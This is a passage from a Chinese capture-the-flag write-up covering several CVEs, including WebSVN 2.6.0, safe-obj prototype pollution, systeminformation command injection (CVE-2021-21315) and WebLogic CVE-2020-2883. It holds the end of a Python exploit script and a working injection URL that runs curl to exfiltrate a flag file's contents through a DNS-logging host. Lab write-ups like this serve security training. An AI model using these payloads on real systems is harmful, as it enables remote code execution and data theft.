parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
 
args = parser.parse_args()
 
if args.target.startswith("http://") or args.target.startswith("https://"):
  target = args.target
else:
  print("[!] Target should start with either http:// or https://")
  exit()
 
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
 
print("[*] Request send. Did you get what you wanted?")

31e672c3d37bf37c285b076689491242.png
vps 收到
b4b567b4bbbe1d789df00a72b2cf9318.png

CVE-2021-25928

faa008aa1a0dd4214419f7bcf680bbb5.png
靶标介绍:
‘safe-obj’ 版本 1.0.0 到 1.0.2 中的原型污染漏洞允许攻击者导致拒绝服务并可能导致远程代码执行。

参考:
https://github.com/superlink996/chunqiuyunjingbachang
https://blog.csdn.net/m0_64348326/article/details/130632693

CVE-2021-21315

30386576c6e524c41e62566ff5c51a02.png
image.png
靶标介绍:
systeminformation是一个简单的查询系统和OS信息包
const http = require('http');
const si = require('systeminformation');
const path = require('path');
var express = require('express');
var server = express();


const port = 8080;

server.get('/', (req, res) => {
    res.sendFile(path.join(__dirname+'/app.js'));

  })

server.get('/api/osinfo', (req, res) => {
  const reqinfo = req.query.param
  
  si.processLoad(reqinfo).then((response) => { 
  res.send(response);
  });
 
});

payload

http://eci-2zecp5w6bzs1ze079zd2.cloudeci1.ichunqiu.com:8080/api/osinfo?param[]=$(curl%20`cat%20/flag`.qeu3ubpc.dnslog.pw)
99212a4456cb6f961ef6b0d17994b615.png
image.png

CVE-2020-2883

c3a1d8a12c5363b138844cb24690b7db.png
靶标介绍:
在Oracle官方发布的2020年4月关键补丁公告中,两个针对WebLogic Server的严重漏洞(CVE-2020-2883和CVE-2020-2884),允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的Weblogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而导致远程代码被执行。

直接使用工具梭哈

;